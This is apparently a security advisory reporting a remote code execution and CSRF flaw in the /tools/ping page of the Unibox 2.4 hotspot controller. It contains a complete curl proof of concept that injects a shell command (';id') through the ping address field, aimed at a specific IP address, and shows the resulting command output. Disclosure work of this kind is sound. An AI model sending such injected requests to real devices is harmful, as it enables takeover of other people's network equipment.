Unibox 2.4 CSRF / Remote Code Execution

Unibox 2.4 CSRF / Remote Code Execution

Unibox version 2.4 suffers from remote code execution and cross site request forgery vulnerabilities.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
About the Product:
==================
UniBox is one of the most innovative and reliable Hotspot Controllers in
the market today. You can install UniBox to manage any sized WiFi
network without having to replace any existing infrastructure. With
UniBox, you don't need any other solution for managing WiFi access. It
comes packed with features so just one box is enough to handle all the
functions of WiFi hotspots.

Description:
============
An issue was discovered on Unibox SMB with Unibox 2.4 and poterntially
respected all other  devices. There is Code Execution vulnerability via
/tools/ping Function in device which leads to complete device takeover.

Additional Information
======================
The page /tools/ping can be tricked via specially crafted request which
will leads to the code execution on device also device  does not
validate the csrftoken,hence By combining this two attack we can form
the Authencated remote code execution on device leads to complete device
takeover.

[Vulnerability Type]
====================
Remote Code Execution (RCE)
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
curl -i -s -k  -X $'POST' \
    -H $'Host: 136.232.224.22' -H $'User-Agent: Mozilla/5.0 (X11; Linux
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
-H $'Referer: http://136.232.224.22/tools/ping' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 25' -H
$'Connection: close' -H $'Cookie: PHPSESSID=k4l9or0l5xxxxxxxxxxx' -H
$'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=k4l9oxxxxxxxxxx' \
    --data-binary $'pingaction=1&address=1;id' \
    $'http://136.232.224.22/tools/ping'

Sample OutPut
-------------
<table width=100%>
        <tr>
          <td>
        <br>
          </td>
        </tr>
        <tr>
          <td id='pingResponseTable'>
        <table border="1"  bordercolordark='#E0E0E0'
bordercolorlight='#000000' class="search" cellpadding="0" cellspacing="0">
          <tr style='background-color:#3F6C96'>
            <td>
              <font color="white">
            <b> Ping Status</b>
              </font>
            </td>
            <br>
          </tr>
          <tr style='background-color:#D8E4F8'>
            <td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
              <br>
            </td>
          </tr>
        </table>


[Affected Component]
/tools/ping

------------------------------------------

[Attack Type]
Remote

------------------------------------------